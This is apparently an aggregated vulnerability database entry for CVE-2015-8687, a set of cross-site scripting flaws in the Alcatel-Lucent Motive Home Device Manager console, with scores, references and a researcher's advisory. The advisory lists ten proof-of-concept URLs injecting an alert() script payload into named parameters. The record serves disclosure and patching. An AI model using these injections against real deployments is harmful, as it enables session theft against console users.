ID

VAR-201703-0219


CVE

CVE-2015-8687


TITLE

Cross-site scripting vulnerability in the Management Console of Alcatel-Lucent Motive Home Device Manager

Trust: 0.8

sources: JVNDB: JVNDB-2015-007437

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do.

Alcatel-Lucent Home Device Manager is a device manager that helps manage and control home network devices through the help desk. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

10 Dec 2015 Vendor returned; investigating
16 Dec 2015 Vendor has validated the issues & fixed
27 Dec 2015 CVE number assigned
03 Jan 2016 Disclosed

Affected Product(s):
====================
Alcatel Lucent Home Device Manager - Management Console 4.1.10.5; older versions may also be affected

Exploitation Technique:
=======================
Local, Authenticated

Severity Level:
===============
High

Technical Details & Description:
================================
- Sample Payload: 42f8b36<script>alert(1)<%2fscript>152b4
- Affected Path/Parameter: [10 parameter]

1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]
   http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36 <script>alert(1)<%2fscript>152b4
2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]
   http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31 "><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0
3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]
   http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3 "><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0
4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]
   http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b <script>alert(1)<%2fscript>1a032
5. /hdm/ajax.do [operation parameter]
   http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81 <script>alert(1)<%2fscript>238957ca4e0&deviceId=8001
6. /hdm/device/editDevice.do [deviceID parameter]
   http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5 <script>alert(1)<%2fscript>45f4a
7. /hdm/policy/findPolicies.do [policyAction parameter]
   http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01 "><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all
8. /hdm/policy/findPolicies.do [policyClass parameter]
   http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb "><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all
9. /hdm/policy/findPolicies.do [policyName parameter]
   http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd "><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all
10. /hdm/xmlHttp.do [operation parameter]
   http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c <script>alert(1)<%2fscript>217f045ae1f&deviceID=8001

Proof of Concept (PoC):
=======================
POC Video: https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing

Solution Fix & Patch:
====================
Fixed in version 4.2

Security Risk:
==============
The risk of the vulnerability above is estimated as high.

Credits & Authors:
==================
Ugur Cihan Koc (@_uceka_)
Blog: www.uceka.com

Trust: 2.52

sources: NVD: CVE-2015-8687 // JVNDB: JVNDB-2015-007437 // CNVD: CNVD-2016-00356 // BID: 79864 // PACKETSTORM: 135133

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-00356

AFFECTED PRODUCTS

vendor: alcatel lucent, model: motive home device manager, scope: lte, version: 4.1.10.5

Trust: 1.0

vendor: alcatel lucent, model: home device manager, scope: eq, version: 4.1.10.5

Trust: 0.9

vendor: alcatel lucent, model: motive home device manager, scope: lt, version: 4.2

Trust: 0.8

vendor: alcatel lucent, model: motive home device manager, scope: eq, version: 4.1.10.5

Trust: 0.6

vendor: alcatel lucent, model: home device manager, scope: ne, version: 4.2

Trust: 0.3

sources: CNVD: CNVD-2016-00356 // BID: 79864 // JVNDB: JVNDB-2015-007437 // CNNVD: CNNVD-201601-316 // NVD: CVE-2015-8687

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-8687
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-8687
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2016-00356
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201601-316
value: LOW

Trust: 0.6

nvd@nist.gov: CVE-2015-8687
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2016-00356
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2015-8687
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2016-00356 // JVNDB: JVNDB-2015-007437 // CNNVD: CNNVD-201601-316 // NVD: CVE-2015-8687

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.8

sources: JVNDB: JVNDB-2015-007437 // NVD: CVE-2015-8687

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201601-316

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 135133 // CNNVD: CNNVD-201601-316

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-007437

PATCH

title: Top Page, url: https://networks.nokia.com/

Trust: 0.8

title: Patch for Alcatel-Lucent Home Device Manager Cross-Site Scripting Vulnerability, url: https://www.cnvd.org.cn/patchInfo/show/70289

Trust: 0.6

sources: CNVD: CNVD-2016-00356 // JVNDB: JVNDB-2015-007437

EXTERNAL IDS

db: NVD, id: CVE-2015-8687

Trust: 3.4

db: BID, id: 79864

Trust: 1.5

db: JVNDB, id: JVNDB-2015-007437

Trust: 0.8

db: CNVD, id: CNVD-2016-00356

Trust: 0.6

db: CNNVD, id: CNNVD-201601-316

Trust: 0.6

db: PACKETSTORM, id: 135133

Trust: 0.1

sources: CNVD: CNVD-2016-00356 // BID: 79864 // JVNDB: JVNDB-2015-007437 // PACKETSTORM: 135133 // CNNVD: CNNVD-201601-316 // NVD: CVE-2015-8687

REFERENCES

url:http://seclists.org/fulldisclosure/2016/jan/0

Trust: 2.7

url:http://www.securityfocus.com/bid/79864

Trust: 1.2

url:https://nvd.nist.gov/vuln/detail/cve-2015-8687

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8687

Trust: 0.8

url:http://www.alcatel-lucent.com/

Trust: 0.3

url:http://10.240.71.198:7003/hdm/devicetype/getdevicetype.do?devicetypeid=42f8b36

Trust: 0.1

url:http://10.240.71.198:7003/hdm/device/editdevice.do?deviceid=8001c94e5

Trust: 0.1

url:http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1&policyactionname=&policyactionclass=c9e31

Trust: 0.1

url:http://10.240.71.198:7003/hdm/xmlhttp.do?operation=getqueuedactionsd4b0c

Trust: 0.1

url:http://10.240.71.198:7003/hdm/singledevicemgmt/getdevice.do?deviceid=8001a1a0b

Trust: 0.1

url:https://www.uceka.com

Trust: 0.1

url:https://drive.google.com/file/d/0b-lwhbwdk3p9y3uyznfmzjjqa1u/view?usp=sharing

Trust: 0.1

url:http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1&policyname=&policyaction=&policyclass=c77cb

Trust: 0.1

url:http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1&policyname=&policyaction=19f01

Trust: 0.1

url:http://10.240.71.198:7003/hdm/ajax.do?operation=getdevicebyid0fa81

Trust: 0.1

url:http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1&policyname=654dd

Trust: 0.1

url:http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1&policyactionname=553a3

Trust: 0.1

sources: CNVD: CNVD-2016-00356 // BID: 79864 // JVNDB: JVNDB-2015-007437 // PACKETSTORM: 135133 // CNNVD: CNNVD-201601-316 // NVD: CVE-2015-8687

CREDITS

Ugur Cihan Koc

Trust: 1.0

sources: BID: 79864 // PACKETSTORM: 135133 // CNNVD: CNNVD-201601-316

SOURCES

db: CNVD, id: CNVD-2016-00356
db: BID, id: 79864
db: JVNDB, id: JVNDB-2015-007437
db: PACKETSTORM, id: 135133
db: CNNVD, id: CNNVD-201601-316
db: NVD, id: CVE-2015-8687

LAST UPDATE DATE

2025-04-20T23:29:44.692000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2016-00356, date: 2016-01-20T00:00:00
db: BID, id: 79864, date: 2016-01-03T00:00:00
db: JVNDB, id: JVNDB-2015-007437, date: 2017-04-25T00:00:00
db: CNNVD, id: CNNVD-201601-316, date: 2017-03-30T00:00:00
db: NVD, id: CVE-2015-8687, date: 2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2016-00356, date: 2016-01-20T00:00:00
db: BID, id: 79864, date: 2016-01-03T00:00:00
db: JVNDB, id: JVNDB-2015-007437, date: 2017-04-25T00:00:00
db: PACKETSTORM, id: 135133, date: 2016-01-05T13:13:13
db: CNNVD, id: CNNVD-201601-316, date: 2016-01-15T00:00:00
db: NVD, id: CVE-2015-8687, date: 2017-03-23T20:59:00.733